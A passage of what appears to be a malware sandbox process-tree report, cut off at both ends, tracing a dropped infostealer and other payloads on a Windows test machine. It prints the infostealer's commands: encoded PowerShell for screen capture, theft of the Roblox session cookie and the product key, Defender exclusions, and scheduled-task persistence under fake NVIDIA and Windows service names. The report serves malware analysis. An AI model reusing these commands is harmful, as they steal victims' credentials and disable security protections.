kAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:3228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1608 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f3bpekat\f3bpekat.cmdline"6⤵PID:5524
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES15C5.tmp" "c:\Users\Admin\AppData\Local\Temp\f3bpekat\CSCAF0E706D43C4C80A78CAF67A3522FB4.TMP"7⤵PID:5708
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5340
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5376
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5568
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5608
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5724
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5796
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5996
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6128
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 760"4⤵PID:1640
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7605⤵
- Kills process with taskkill
PID:5996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"4⤵PID:2772
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48325⤵
- Kills process with taskkill
PID:5480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2716"4⤵PID:2936
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27165⤵
- Kills process with taskkill
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 760"4⤵PID:2392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4656
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7605⤵
- Kills process with taskkill
PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 992"4⤵PID:4920
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9925⤵
- Kills process with taskkill
PID:3084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:4828
-
C:\Windows\system32\getmac.exegetmac5⤵PID:5832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"4⤵PID:5796
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48325⤵
- Kills process with taskkill
PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3528"4⤵PID:5448
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35285⤵
- Kills process with taskkill
PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2716"4⤵PID:860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2380
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27165⤵
- Kills process with taskkill
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2804"4⤵PID:420
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28045⤵
- Kills process with taskkill
PID:5676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 992"4⤵PID:4036
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9925⤵
- Kills process with taskkill
PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1988"4⤵PID:1604
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19885⤵
- Kills process with taskkill
PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3528"4⤵PID:2820
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35285⤵
- Kills process with taskkill
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2804"4⤵PID:804
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28045⤵
- Kills process with taskkill
PID:4084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1988"4⤵PID:3688
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19885⤵
- Kills process with taskkill
PID:1608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:1928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\U2IYf.zip" *"4⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI32042\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\U2IYf.zip" *5⤵
- Executes dropped EXE
PID:5220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:6024
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:4036
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:3328
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:5656
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:6056
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:3980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4752
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Gorebox%20ModMenu%201.2.0.exe"C:\Users\Admin\AppData\Local\Temp\Files\Gorebox%20ModMenu%201.2.0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Helper.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\NVIDIA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NVIDIA.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1116
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA" /tr "C:\ProgramData\NVIDIA.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\alphaTweaks.exe"C:\Users\Admin\AppData\Local\Temp\Files\alphaTweaks.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"2⤵
- Executes dropped EXE
PID:1708 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\K47jqE1TxODI.bat" "3⤵PID:5316
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:3772
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"4⤵
- Executes dropped EXE
PID:5724 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V0cefY6pukEp.bat" "5⤵PID:3280
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:4616
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"6⤵
- Executes dropped EXE
PID:5492 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2980
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dw1p7iu2DwL1.bat" "7⤵PID:6064
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1124
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5872
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"8⤵
- Executes dropped EXE
PID:5976 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:1108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AjK6inShryIr.bat" "9⤵PID:2464
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5084
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4696
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"10⤵
- Executes dropped EXE
PID:1556 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵PID:5504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GV7IDjWzmAWy.bat" "11⤵PID:2340
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:5088
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"12⤵
- Executes dropped EXE
PID:5844 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:5020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gSpcODS0jmOI.bat" "13⤵PID:5472
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3468
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- Runs ping.exe
PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"14⤵
- Executes dropped EXE
PID:5128 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhSwlhizp39I.bat" "15⤵PID:5160
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:1820
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"16⤵
- Executes dropped EXE
PID:4836 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9QSghKkVKQiU.bat" "17⤵PID:716
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:1384
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- Runs ping.exe
PID:5560
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"18⤵
- Executes dropped EXE
PID:200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jq0yAx7u7htf.bat" "19⤵PID:2140
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:1552
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"20⤵
- Executes dropped EXE
PID:6060 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZVbtrclbjbVx.bat" "21⤵PID:5816
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:4496
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:660
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"22⤵
- Executes dropped EXE
PID:2608 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f23⤵PID:4252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yqHc3nv0CFIv.bat" "23⤵PID:4104
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:1584
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"24⤵
- Executes dropped EXE
PID:5152 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:5408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b4T4Jz3Pbolf.bat" "25⤵PID:3672
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:5620
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4992
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"26⤵
- Executes dropped EXE
PID:5124 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f27⤵
